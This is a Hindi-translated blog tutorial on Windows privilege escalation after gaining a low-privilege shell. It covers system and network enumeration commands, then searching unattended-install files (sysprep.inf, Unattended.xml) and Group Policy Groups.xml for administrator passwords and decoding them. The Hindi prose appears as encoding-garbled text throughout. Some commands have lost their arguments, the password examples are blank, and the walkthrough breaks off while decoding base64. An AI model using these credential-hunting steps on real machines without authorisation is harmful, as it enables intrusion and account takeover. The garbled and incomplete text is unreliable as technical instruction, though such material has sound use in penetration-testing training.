Geekly articles weekly

рд╡рд┐рдВрдбреЛрдЬ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдореВрд▓ рдмрд╛рддреЗрдВ

рдореИрдВрдиреЗ рдЕрдкрдиреЗ рд▓рд┐рдП рдФрд░ рдЙрди рд▓реЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛ рдЬреЛ рдЗрд╕реЗ рдЙрдкрдпреЛрдЧреА рдкрд╛рддреЗ рд╣реИрдВ, рдЬреЛ рдореИрдВ рдЬрд╛рдирддрд╛ рд╣реВрдВ рдХрд┐ рд╕рдм рдХреБрдЫ рдЗрдХрдЯреНрдард╛ рдХрд░рдирд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдореБрдЭреЗ рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ рд╡рд┐рд╖рдп рдкрд░ рдпрд╛рдж рдирд╣реАрдВ рд╣реИред рд╢реЗрдпрд░ рдЯрд┐рдкреНрд╕ред рдЗрд╕ рд▓реЗрдЦ рдХрд╛ рдореБрдЦреНрдп рд╕реНрд░реЛрдд рдпрд╣ рд╣реИ ред

рдореИрдВрдиреЗ рд╕реНрд╡рддрдВрддреНрд░ рд░реВрдк рд╕реЗ рдЕрдиреБрд╡рд╛рдж рдХрд┐рдпрд╛ рдФрд░ рдЕрдкрдиреЗ рдЖрдк рд╕реЗ рдереЛрдбрд╝рд╛ рдЬреЛрдбрд╝рд╛, рдЬреЛ рдореИрдВрдиреЗ рдЗрдХрдЯреНрдард╛ рдХрд┐рдпрд╛ рдФрд░ рдЕрдиреНрдп рд╕реНрд░реЛрддреЛрдВ рд╕реЗ рд╕реАрдЦрд╛ред

рд╕рд╛рдорд╛рдиреНрдп рддреМрд░ рдкрд░, рдпрд╣рд╛рдВ рд╣рдорд╛рд░реЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рд▓рдХреНрд╖реНрдп рдХреЛ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдореЗрдВ рд╣рдорд╛рд░реА рд╕рд╣рд╛рдпрддрд╛ рдХрд░рдиреЗ рдХреЗ рддрд░реАрдХреЗ рд╣реИрдВред

рдЗрд╕ рд▓рдШреБ рд▓реЗрдЦ рдХреЗ рд▓рд┐рдП рдкреНрд░рд╛рд░рдВрднрд┐рдХ рдмрд┐рдВрджреБ рдПрдХ рдЕрдирдкреЗрдХреНрд╖рд┐рдд рдЦреЛрд▓ (рдЦрд╛рддрд╛) рд╣реИред рд╢рд╛рдпрдж рд╣рдордиреЗ рдПрдХ рд╢реЛрд╖рдг рдХрд╛ рдЗрд╕реНрддреЗрдорд╛рд▓ рдХрд┐рдпрд╛ рдпрд╛ рдПрдХ рд╣рдорд▓реЗ рдХреЛ рдЕрдВрдЬрд╛рдо рджрд┐рдпрд╛ рдФрд░ рдпрд╣ рдЦреЛрд▓ рдорд┐рд▓рд╛ред

рдореВрд▓ рд░реВрдк рд╕реЗ, рдкреНрд░рд╛рд░рдВрднрд┐рдХ рд╕рдордп рдореЗрдВ, рд╣рдо рдорд╢реАрди рдХреЛ рдирд╣реАрдВ рд╕рдордЭрддреЗ рд╣реИрдВ: рдпрд╣ рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИ, рдпрд╣ рдХрд┐рд╕рд╕реЗ рдЬреБрдбрд╝рд╛ рд╣реИ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдХрд┐рд╕ рд╕реНрддрд░ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ, рдпрд╛ рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ рдпрд╣ рдХрд┐рд╕ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рд╣реИред

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рд╣рдореЗрдВ рдпрд╣ рд╕рдордЭрдиреЗ рдХреА рдЬрд░реВрд░рдд рд╣реИ рдХрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдХреНрдпрд╛ рд╣реИ рдФрд░ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдХреНрдпрд╛ рд╣реИ:

systeminfo | findstr /B /C:" " /C:" "

рдпрд╣ рдХрдорд╛рдВрдб рдЖрдкрдХреЛ рдпрд╣ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рдЗрд╕реЗ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдУрдПрд╕ рдХрд╛ рдирд╛рдо рдФрд░ рд╕рдВрд╕реНрдХрд░рдгред рдЖрдк рдЗрд╕реЗ рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рдмрд┐рдирд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдлрд┐рд░ рдХрдорд╛рдВрдб рдХрд╛ рдЖрдЙрдЯрдкреБрдЯ рдЕрдзрд┐рдХ рдкреВрд░реНрдг рд╣реЛрдЧрд╛, рд▓реЗрдХрд┐рди рдпрд╣ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рдкрд░реНрдпрд╛рдкреНрдд рд╣реИред

рдЗрд╕рдХреЗ рдмрд╛рдж, рдорд╢реАрди рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╣реИ рдЬрд┐рд╕рдХреЗ рддрд╣рдд рд╣рдо рдЬреБрдбрд╝реЗ рд╣реБрдП рд╣реИрдВред

  • рд╣реЛрд╕реНрдЯрдирд╛рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рд╣реИред
  • рдЗрдХреЛ% рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо% - рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдоред

рдЕрдЧрд▓рд╛, рдЖрдЗрдП рджреЗрдЦреЗрдВ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрднреА рднреА рдЗрд╕ рд╣реЛрд╕реНрдЯ рдкрд░ рд╣реИрдВ рдФрд░ рдЕрдкрдиреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВред

  • рд╢реБрджреНрдз рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ - рдЕрдиреНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛
  • net user user1 - рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд░ рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА, рдЬрд╣рд╛рдВ user1 рдЖрдкрдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрд╛ рдирд╛рдо рд╣реИред

рдЦрд╛рддреЗ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо рдЗрд╕ рд╣реЛрд╕реНрдЯ рдХреЗ рдиреЗрдЯрд╡рд░реНрдХ рдЗрдВрдЯрд░реИрдХреНрд╢рди рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рджреЗрдЦреЗрдВрдЧреЗред

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдЙрдкрд▓рдмреНрдз рдЗрдВрдЯрд░рдлреЗрд╕ рдФрд░ рд░реВрдЯрд┐рдВрдЧ рдЯреЗрдмрд▓ рдкрд░ рдПрдХ рдирдЬрд╝рд░ рдбрд╛рд▓реЗрдВред

  • ipconfig / all - рдЙрдкрд▓рдмреНрдз рдЗрдВрдЯрд░рдлреЗрд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реАред
  • рд░реВрдЯ рдкреНрд░рд┐рдВрдЯ - рд░рд╛рдЙрдЯрд┐рдВрдЧ рдЯреЗрдмрд▓
  • arp -A - рд╕рд╛рд░рдгреА рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐рдпреЛрдВ рдХреА рддрд╛рд▓рд┐рдХрд╛

рдЕрдЧрд▓рд╛, рд╣рдо рд╕рдХреНрд░рд┐рдп рдиреЗрдЯрд╡рд░реНрдХ рдХрдиреЗрдХреНрд╢рди рдФрд░ рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдирд┐рдпрдо рджреЗрдЦреЗрдВрдЧреЗред

  • netstat -ano - рд╕рдХреНрд░рд┐рдп рдиреЗрдЯрд╡рд░реНрдХ рдХрдиреЗрдХреНрд╢рдиред

-a - рдЗрд╕ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд╕рд╛рде рд▓реЙрдиреНрдЪ рдХрд░рдирд╛ рд╕рднреА рд╕рдХреНрд░рд┐рдп рдЯреАрд╕реАрдкреА рдХрдиреЗрдХреНрд╢рди, рд╕рд╛рде рд╣реА рд╕рд┐рд╕реНрдЯрдо рджреНрд╡рд╛рд░рд╛ рд╕реБрдиреА рдЧрдИ рдЯреАрд╕реАрдкреА рдФрд░ рдпреВрдбреАрдкреА рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреЛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рддрд╛ рд╣реИ;
-n - рдкреИрд░рд╛рдореАрдЯрд░ рдЖрдкрдХреЛ рдкрддреЗ рдФрд░ рдкреЛрд░реНрдЯ рдирдВрдмрд░ рдХреЗ рд╕рд╛рде рд╕рдХреНрд░рд┐рдп рдЯреАрд╕реАрдкреА рдХрдиреЗрдХреНрд╢рди рджрд┐рдЦрд╛рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ;
-o - рдкрд┐рдЫрд▓реА рдХреБрдВрдЬреА рдХреЗ рд╕рдорд╛рди, рд╕рдХреНрд░рд┐рдп рдЯреАрд╕реАрдкреА рдХрдиреЗрдХреНрд╢рди рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЖрдВрдХрдбрд╝реЛрдВ рдореЗрдВ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛрдб рдЬреЛрдбрд╝реЗ рдЬрд╛рддреЗ рд╣реИрдВ, рдпрд╣ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реИ рдХрд┐ рдХреМрди рд╕рд╛ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХрдиреЗрдХреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред

  • netsh рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рд╢реЛ рд╕реНрдЯреЗрдЯ - рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рд╕реНрдерд┐рддрд┐
  • netsh рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рд╢реЛ рд╡рд┐рдиреНрдпрд╛рд╕ - рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди

рдЕрдВрдд рдореЗрдВ, рд╣рдо рд╕рдВрдХреНрд╖реЗрдк рдореЗрдВ рдЬрд╛рдБрдЪрддреЗ рд╣реИрдВ рдХрд┐ рдПрдХ рд╕рдордЭреМрддрд╛ рдХрд┐рдП рдЧрдП рд╣реЛрд╕реНрдЯ рдкрд░ рдХреНрдпрд╛ рдХрд╛рдо рд╣реЛрддрд╛ рд╣реИ: рд╢реЗрдбреНрдпреВрд▓ рдХрд┐рдП рдЧрдП рдХрд╛рд░реНрдп, рд░рдирд┐рдВрдЧ рдкреНрд░реЛрд╕реЗрд╕, рд░рдирд┐рдВрдЧ рд╕рд░реНрд╡рд┐рд╕реЗрдЬ рдФрд░ рдЗрдВрд╕реНрдЯреЙрд▓ рдХрд┐рдП рдЧрдП рдбреНрд░рд╛рдЗрд╡рд░ред

 schtasks /query /fo LIST /v

рдЬрд╣рд╛рдБ
/ рдХреНрд╡реЗрд░реА - рд╕рднреА рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд╛рд░реНрдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдбреЗрдЯрд╛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рддрд╛ рд╣реИ,
/ рдХреЗ рд▓рд┐рдП рд╕реВрдЪреА - рдЙрддреНрдкрд╛рджрди рд╕реВрдЪреАред
/ v - рдиреМрдХрд░реА рд╡рд┐рд╡рд░рдг рдкреНрд░рд┐рдВрдЯ рдХрд░реЗрдВред

рдирд┐рдореНрди рдЖрджреЗрд╢ рдЪрд▓рдиреЗ рд╡рд╛рд▓реА рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рд╕рд╛рде рдЪрд▓рдиреЗ рд╡рд╛рд▓реА рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЛ рд╕рдВрдмрджреНрдз рдХрд░рддрд╛ рд╣реИред

 tasklist /SVC

рдЬрд╣рд╛рдВ,
/ рдПрд╕рд╡реАрд╕реА - рдкреНрд░рддреНрдпреЗрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд▓рд┐рдП рдореИрдкрд┐рдВрдЧ рд╕реЗрд╡рд╛рдПрдВред

Windows рд╕реЗрд╡рд╛рдУрдВ рдХреЛ рдЪрд▓рд╛рдиреЗ рдХреА рдПрдХ рд╕реВрдЪреА рднреА рджреЗрдЦреЗрдВред

 net start

рдПрдХ рд╕рдордЭреМрддрд╛ рдкреНрд░рдгрд╛рд▓реА рдХреЗ рдбреНрд░рд╛рдЗрд╡рд░реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рджреЗрдЦрдирд╛ рднреА рдЙрдкрдпреЛрдЧреА рд╣реИред

 DRIVERQUERY

рдЕрдЧрд▓рд╛, рдореИрдВ рд╢рд╛рдпрдж рд╕рдмрд╕реЗ рдЙрдкрдпреЛрдЧреА рд╡рд┐рдВрдбреЛрдЬ рдХрдорд╛рдВрдб рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЙрд▓реНрд▓реЗрдЦ рдХрд░рдирд╛ рдЪрд╛рд╣рддрд╛ рд╣реВрдВ - рд╡рд┐рдХреАред WMIC (рд╡рд┐рдВрдбреЛрдЬ рдореИрдиреЗрдЬрдореЗрдВрдЯ рдЗрдВрд╕реНрдЯреНрд░реВрдореЗрдВрдЯреЗрд╢рди рдХрдорд╛рдВрдб) рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рд╣рд╛рд░реНрдбрд╡реЗрдпрд░ рдФрд░ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ, рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдФрд░ рдЙрдирдХреЗ рдШрдЯрдХреЛрдВ рдХреЛ рдкреНрд░рдмрдВрдзрд┐рдд рдХрд░рдиреЗ рдФрд░ рд╡рд┐рдВрдбреЛрдЬ рдореИрдиреЗрдЬрдореЗрдВрдЯ рдЗрдВрд╕реНрдЯреНрд░реВрдореЗрдВрдЯреЗрд╢рди (рд╡рд┐рдВрдбреЛрдЬ рдореИрдиреЗрдЬрдореЗрдВрдЯ рдЗрдВрд╕реНрдЯреНрд░реВрдореЗрдВрдЯреЗрд╢рди рдпрд╛ WMI) рдХреА рдХреНрд╖рдорддрд╛рдУрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЛ рдмрджрд▓рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЕрдЪреНрдЫрд╛ рд╡рд░реНрдгрди ред

рджреБрд░реНрднрд╛рдЧреНрдп рд╕реЗ, рдХреБрдЫ рд╡рд┐рдВрдбреЛрдЬ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ WMIC рддрдХ рдкрд╣реБрдВрдЪ рдХреА рдЕрдиреБрдорддрд┐ рдирд╣реАрдВ рджреЗрддреЗ рд╣реИрдВ рдпрджрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕рдореВрд╣ рдХрд╛ рд╕рджрд╕реНрдп рдирд╣реАрдВ рд╣реИ (рдЬреЛ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдЕрдЪреНрдЫрд╛ рд╡рд┐рдЪрд╛рд░ рд╣реИ)ред XP рдХреЗ рдХрд┐рд╕реА рднреА рд╕рдВрд╕реНрдХрд░рдг рдиреЗ рдЕрдирдкреЗрдХреНрд╖рд┐рдд рдЦрд╛рддреЗ рд╕реЗ WMIC рддрдХ рдкрд╣реБрдВрдЪ рдХреА рдЕрдиреБрдорддрд┐ рдирд╣реАрдВ рджреАред

рдЗрд╕рдХреЗ рд╡рд┐рдкрд░реАрдд, рд╡рд┐рдВрдбреЛрдЬ 7 рдкреНрд░реЛрдлреЗрд╢рдирд▓ рдФрд░ рд╡рд┐рдВрдбреЛрдЬ 8 рдПрдВрдЯрд░рдкреНрд░рд╛рдЗрдЬ рдХрдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ WMIC рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рдмрдирд╛рддрд╛ рд╣реИред

рд╣рдореЗрд╢рд╛ рдХреА рддрд░рд╣ - рдкреНрд░реЛрдЧреНрд░рд╛рдо рдкреИрд░рд╛рдореАрдЯрд░:

 wmic /?

рд╡рд┐рдХреА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЬрд╛рдирдХрд╛рд░реА рдПрдХрддреНрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдЕрдЪреНрдЫреА рд╕реНрдХреНрд░рд┐рдкреНрдЯред

рдЖрдЧреЗ рдмрдврд╝рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ, рдПрдХрддреНрд░рд┐рдд рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЗрд╕реЗ рдЪрд▓рд╛рдиреЗ рд▓рд╛рдпрдХ рд╣реИред рдпрд╣ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд╕реНрдерд╛рдкрд┐рдд рдкреИрдЪ рдкрд░ рднреА рдзреНрдпрд╛рди рджреЗрдиреЗ рдпреЛрдЧреНрдп рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдЫреЗрдж рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдХреЛрдИ рднреА рдЬрд╛рдирдХрд╛рд░реА рд╣рдорд╛рд░реЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рд╣рдореЗрдВ рдЕрддрд┐рд░рд┐рдХреНрдд рд╕рдорд░реНрдерди рджреЗрдЧреАред HotFix рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рджреЗрдЦ рд╕рдХрддрд╛ рд╣реИред

рдЕрдЧрд▓рд╛, рд╣рдо рдПрдХ рдЕрдкреНрд░рд╛рдкреНрдп рд╕реНрдерд╛рдкрдирд╛ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВрдЧреЗред рдпрджрд┐ рдорд╢реАрдиреЛрдВ рдХреЗ рдПрдХ рдмрдбрд╝реЗ рдмреЗрдбрд╝реЗ рдХреЛ рд╕реНрдерд╛рдкрд┐рдд рдФрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рддреЛ рдПрдХ рдирд┐рдпрдо рдХреЗ рд░реВрдк рдореЗрдВ, рддрдХрдиреАрдХреА рдХрд░реНрдордЪрд╛рд░реА рдорд╢реАрди рд╕реЗ рдорд╢реАрди рд╕реЗ рдкреНрд░рддреНрдпреЗрдХ рд╡реНрдпрдХреНрддрд┐рдЧрдд рдПрдХ рдХреЛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдирд╣реАрдВ рдХрд░реЗрдВрдЧреЗред рдЕрдкреНрд░рд╛рдкреНрдп рд╕реНрдерд╛рдкрдирд╛ рдХреЗ рд▓рд┐рдП рдХрдИ рд╕рдорд╛рдзрд╛рди рд╣реИрдВред рдпрд╣ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рдЗрддрдирд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдирд╣реАрдВ рд╣реИ рдХрд┐ рдпреЗ рддрд░реАрдХреЗ рдХреНрдпрд╛ рд╣реИрдВ рдФрд░ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдпрд╣ рдХреНрдпрд╛ рдорд╛рдпрдиреЗ рд░рдЦрддрд╛ рд╣реИ рдХрд┐ рд╡реЗ рдЙрди рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдЫреЛрдбрд╝ рджреЗрддреЗ рд╣реИрдВ рдЬреЛ рд╕реНрдерд╛рдкрдирд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛рддреА рд╣реИрдВ рдЬрд┐рдирдореЗрдВ рдмрд╣реБрдд рд╕рд╛рд░реА рдЧреЛрдкрдиреАрдп рдЬрд╛рдирдХрд╛рд░реА рд╣реЛрддреА рд╣реИ, рдЬреИрд╕реЗ рдХрд┐ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рдЙрддреНрдкрд╛рдж рдХреБрдВрдЬреА рдФрд░ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╛рд╕рд╡рд░реНрдбред рд╣рдорд╛рд░реЗ рд▓рд┐рдП рд╕рдмрд╕реЗ рдЕрдзрд┐рдХ рд░реБрдЪрд┐ рдкреНрд░рд╢рд╛рд╕рдХ рдкрд╛рд╕рд╡рд░реНрдб рд╕реЗ рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рд╣рдо рдЕрдкрдиреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдПрдХ рдирд┐рдпрдо рдХреЗ рд░реВрдк рдореЗрдВ, рдпреЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╣реИрдВ:

  • c: \ sysprep.inf
  • c: \ sysprep \ sysprep.xml
  • % WINDIR% \ Panther \ Unattend \ Unattended.xml
  • % WINDIR% \ Panther \ Unattended.xml

рд▓реЗрдХрд┐рди рдпрд╣ рдкреВрд░реА рдкреНрд░рдгрд╛рд▓реА рдХреА рдЬрд╛рдВрдЪ рдХреЗ рд▓рд╛рдпрдХ рд╣реИред

рдЗрди рдлрд╝рд╛рдЗрд▓реЛрдВ рдореЗрдВ рд╕реНрдкрд╖реНрдЯ рдкрд╛рда рдпрд╛ BASE64 рдПрдиреНрдХреЛрдбреЗрдб рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрдВред
рдЙрджрд╛рд╣рд░рдг:

Sysprep.inf - рд╕реНрдкрд╖реНрдЯ рдкрд╛рда рдореЗрдВ рдкрд╛рд╕рд╡рд░реНрдбред

"

Sysprep.xml - base64 рдПрдиреНрдХреЛрдбреЗрдб рдкрд╛рд╕рд╡рд░реНрдбред

"

Unattended.xml - base64 рдПрдиреНрдХреЛрдбреЗрдб рдкрд╛рд╕рд╡рд░реНрдбред



рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдбреЛрдореЗрди рд╕реЗ рдЬреБрдбрд╝реЗ рд╣реЛрд╕реНрдЯ рдХреЗ рд▓рд┐рдП, рдЖрдк Group.xml рдлрд╝рд╛рдЗрд▓ рдХреА рдЦреЛрдЬ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ AES256 рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдкрд╛рд╕рд╡рд░реНрдб рд╣реИ, рд▓реЗрдХрд┐рди рдЬрд┐рд╕реЗ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдХреБрдВрдЬреА msdn (https://msdn.microsoft.com/en-us/library/cc422924.aspx) рдФрд░ рдЕрдиреНрдп рд╕реНрд░реЛрддреЛрдВ рдкрд░ рдкреЛрд╕реНрдЯ рдХреА рдЧрдИ рд╣реИред рд▓реЗрдХрд┐рди рдпрд╣ рдорд╛рдорд▓рд╛ рд╣реИ рдЕрдЧрд░ рдореЗрдЬрдмрд╛рди рдкрд░ рд╕реНрдерд╛рдиреАрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рдмрдирд╛рдиреЗ рдХреА рдиреАрддрд┐ рдпрд╛, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╕реНрдерд╛рдиреАрдп рдкреНрд░рд╢рд╛рд╕рдХ рдХреЗ рд▓рд┐рдП рдкрд╛рд╕рд╡рд░реНрдб рд╕реЗрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред

рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдореЗрд░реЗ рдкрд╛рд╕ рдпрд╣рд╛рдВ рд╣реИ:



рдЗрд╕реЗ рдЦреЛрд▓реЗ рдЬрд╛рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо "рдХреНрд░рд╛рд╕рд╡рд░реНрдб" рдкреИрд░рд╛рдореАрдЯрд░ рдХреА рддрд▓рд╛рд╢ рдХрд░ рд░рд╣реЗ рд╣реИрдВред



рдЕрдЧрд▓рд╛, рдЖрдкрдХреЛ рдЗрд╕ рдЕрдиреБрдХреНрд░рдо рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред рд╣рдо, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, CrypTool рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдмреЗрд╕ 64 рдХреЛ рдбреАрдХреЛрдб рдХрд░реЗрдВред
